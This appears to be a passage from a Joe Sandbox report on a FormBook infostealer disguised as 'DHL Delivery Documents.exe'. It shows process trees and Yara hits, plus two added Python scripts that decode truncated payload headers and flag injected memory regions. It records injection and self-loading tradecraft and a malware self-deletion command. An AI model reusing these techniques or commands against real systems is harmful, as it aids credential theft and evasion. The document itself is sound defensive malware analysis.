                        Data Ascii: AAAAAAYgAQERgJ0pAQAk6buR6a2U546L6buR6a2U546L6buR6a2U546L6buR6a2U546LAAAXAQASQ29weXJpZ2h0IMKpICAyMDIxAAApAQAkZjZmNjk3NzYtYTQ1MS00ZDU0LTkxMjgtNDdkZmYwNDMyZmM3AAAMAQAHMS4wLjAuMAAARwEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRAuTkV


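Both downloads are base64-encoded PE files served by transfer.sh as text/plain over TCP 443 (the sessions are shown decrypted). The report prints only the opening bytes of each 16 kB chunk, so the complete files cannot be rebuilt from this page, but the first preview of each file covers the DOS header and the start of the PE header. The script below is an added example, not part of the Joe Sandbox report: it decodes the two first-chunk previews (copied from the Data Ascii rows above, with runs of zero bytes written as repeats) and reads what is recoverable. BINCC.txt carries x86 code in place of the DOS header fields (a call $+5 / pop eax sequence that locates the MZ base, reads e_lfanew and jumps to AddressOfEntryPoint, so the blob runs without an OS loader) and an MSVC Rich header; bbbbbbbbbbb.txt is a conventional 32-bit PE32 image with IMAGE_FILE_DLL set, which fits the .NET metadata strings (Process, ProcessModule, BinaryReader, .NETFramework,Version=v4.0) visible in its later previews. Field names follow winnt.h; the truncation handling is the example's own.

```python
"""Decode the base64 PE previews shown in the transfer.sh sessions above."""
import base64
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C        # winnt.h
IMAGE_FILE_DLL = 0x2000                 # winnt.h
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B   # winnt.h

# First "Data Ascii" preview of each download, copied from the report. Runs of
# 'A' (zero bytes in base64) are written as repeats; the joined strings equal
# the page text. They are previews only, so the full files cannot be rebuilt.
BINCC_PREVIEW = (
    "TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQ" + "A" * 40
    + "uAAAAA4fug4AtAnNIbgBTM0h"
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"
    + "J" + "A" * 9 + "B9Zj8bOQdRSDkHUUg5B1FIIpr6SHUHUUgims9IOgdRSCKazEg4B1FIUmljaDkHUUg"
    + "A" * 10 + "FBFAABMAQE"
)
BBBB_PREVIEW = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" + "A" * 47
    + "gAAAAA4fug4AtAnNIbgBTM0h"
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"
    + "J" + "A" * 9 + "BQRQAATAEDAAEe82E" + "A" * 10
    + "OAALiALAVAAAJYAAACaAAAAAAAAUrUAAAAgAAAAwAAAAABAAAAgAAAAAgA"
)


def decode_preview(text: str) -> bytes:
    """base64-decode a preview whose last 4-character group may be cut off."""
    s = "".join(text.split())
    rem = len(s) % 4
    if rem == 1:            # a lone trailing character holds no complete byte
        s, rem = s[:-1], 0
    if rem:
        s += "=" * (4 - rem)
    return base64.b64decode(s)


def u16(data: bytes, off: int):
    return struct.unpack_from("<H", data, off)[0] if off + 2 <= len(data) else None


def u32(data: bytes, off: int):
    return struct.unpack_from("<I", data, off)[0] if off + 4 <= len(data) else None


def rich_header_key(data: bytes, limit: int):
    """XOR key of an MSVC Rich header located before offset `limit`, else None."""
    pos = data.find(b"Rich", 0, limit)
    key = u32(data, pos + 4) if pos >= 0 else None
    if key is None:
        return None
    dans = struct.unpack("<I", b"DanS")[0]
    # The block opens with 'DanS' ^ key; walk back in dword steps to confirm it.
    for off in range(pos - 4, -1, -4):
        if u32(data, off) ^ key == dans:
            return key
    return None


def analyse_preview(text: str) -> dict:
    """Header facts recoverable from a truncated PE preview (None = cut off)."""
    data = decode_preview(text)
    info = {"size": len(data), "is_mz": data[:2] == b"MZ"}
    if not info["is_mz"]:
        return info
    # A linker-produced DOS header has e_cblp = 0x0090 at offset 2. BINCC.txt
    # carries x86 code there instead: E8 00000000 / 58 / 83 E8 09 / 8B C8 /
    # 83 C0 3C / 8B 00 / 03 C1 / 83 C0 28 / 03 08 / FF E1, i.e. call $+5;
    # pop eax; sub eax,9 (MZ base); read e_lfanew; add AddressOfEntryPoint
    # (PE+0x28) to the base; jmp. The file runs when dropped into memory as a blob.
    info["standard_dos_stub"] = data[2:4] == b"\x90\x00"
    info["self_loading_stub"] = data[4:9] == b"\xe8\x00\x00\x00\x00"
    pe = u32(data, 0x3C)
    info["e_lfanew"] = pe
    if pe is None:
        return info
    info["rich_key"] = rich_header_key(data, pe)
    info["pe_signature"] = data[pe:pe + 4] == b"PE\0\0" if pe + 4 <= len(data) else None
    info["machine"] = u16(data, pe + 4)
    info["number_of_sections"] = u16(data, pe + 6)
    info["timestamp"] = u32(data, pe + 8)
    info["characteristics"] = u16(data, pe + 22)
    info["is_dll"] = (None if info["characteristics"] is None
                      else bool(info["characteristics"] & IMAGE_FILE_DLL))
    info["optional_magic"] = u16(data, pe + 24)
    return info


if __name__ == "__main__":
    for name, preview in (("BINCC.txt", BINCC_PREVIEW), ("bbbbbbbbbbb.txt", BBBB_PREVIEW)):
        print(name, analyse_preview(preview))
```

The BINCC.txt preview ends two bytes into the COFF header, so everything after the Machine field comes back as None rather than as a guessed value; run the same function over a full dump from the sandbox to fill in the rest.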

                        Target ID:2
                        Start time:14:03:26
                        Start date:28/01/2022
                        Path:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\DHL Delivery Documents.exe"
                        Imagebase:0xad0000
                        File size:48640 bytes
                        MD5 hash:5BC8492C9F262D1F9840635B87EDF9C5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Target ID:7
                        Start time:14:03:31
                        Start date:28/01/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Imagebase:0x970000
                        File size:55400 bytes
                        MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        Target ID:8
                        Start time:14:03:34
                        Start date:28/01/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff720ea0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:12
                        Start time:14:03:56
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\msdt.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\msdt.exe
                        Imagebase:0xeb0000
                        File size:1508352 bytes
                        MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        Target ID:13
                        Start time:14:04:02
                        Start date:28/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:14
                        Start time:14:04:03
                        Start date:28/01/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

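The Source field of every Yara match above is the name of the memory dump the rule fired on. Read with the field layout assumed here (target ID, dump phase, counter, region base, page protection, two fields left uninterpreted, region type), the names say where FormBook code was found: in aspnet_compiler.exe (Target 7, whose own image base is 0x970000) the rules hit an RWX private region at 0x400000 already at process start, i.e. a PE written into the process rather than mapped from disk, and in explorer.exe (Target 8) an RWX mapped region at 0x1025A000, matching the "Maps a DLL or memory area into another process" signature. The script below is an added example, not part of the report: it parses a handful of match lines copied from Targets 2, 7 and 8 and lists every executable region that is not image-backed. The field layout and the readings 0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE, 0x40000 = MEM_MAPPED are assumptions that line up with the winnt.h constants; the page does not document the dump-name format.

```python
"""Triage the Yara match sources (memory-dump names) listed per process above."""
import re

# winnt.h constants
PAGE_EXECUTE_MASK = 0xF0   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed dump-name layout (example's own reading, checked against the values on
# the page): target.f2.f3.base.protect.f6.type.f8.sdmp; f2, f3, f6, f8 are not used.
DUMP_NAME = re.compile(
    r"(?P<target>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)
MATCH_LINE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<source>\S+\.sdmp)")

# Constructed sample: five Yara match lines copied from Targets 2, 7 and 8 above.
SAMPLE_LINES = """
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
"""


def parse_matches(text: str) -> dict:
    """Map each dump name to its decoded region and the set of rules that hit it."""
    regions = {}
    for line in text.splitlines():
        m = MATCH_LINE.search(line)
        d = DUMP_NAME.fullmatch(m["source"]) if m else None
        if not d:
            continue
        rec = regions.setdefault(m["source"], {
            "target": int(d["target"], 16),
            "base": int(d["base"], 16),
            "protect": int(d["protect"], 16),
            "type": int(d["type"], 16),
            "rules": set(),
        })
        rec["rules"].add(m["rule"].strip())
    return regions


def executable_non_image(regions: dict) -> list:
    """Executable regions not backed by an image section. A PE found in such a
    region was written there by code (hollowing, section mapping), not loaded
    from disk by the OS, so these are the regions worth dumping first."""
    hits = [r for r in regions.values()
            if r["protect"] & PAGE_EXECUTE_MASK and r["type"] != MEM_IMAGE]
    return sorted(hits, key=lambda r: (r["target"], r["base"]))


def describe(region: dict) -> str:
    return "target %d: base 0x%08X protect 0x%02X %s rules=%s" % (
        region["target"], region["base"], region["protect"],
        TYPE_NAMES.get(region["type"], hex(region["type"])),
        ",".join(sorted(region["rules"])))


if __name__ == "__main__":
    for r in executable_non_image(parse_matches(SAMPLE_LINES)):
        print(describe(r))
```

The Target 2 entry (the .NET dropper's own heap at 0x13AD4000, protection 0x04) is deliberately not flagged: it is where the decoded payload sits before injection, readable and writable but never executable, which is the distinction the filter is built on.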
                        No disassembly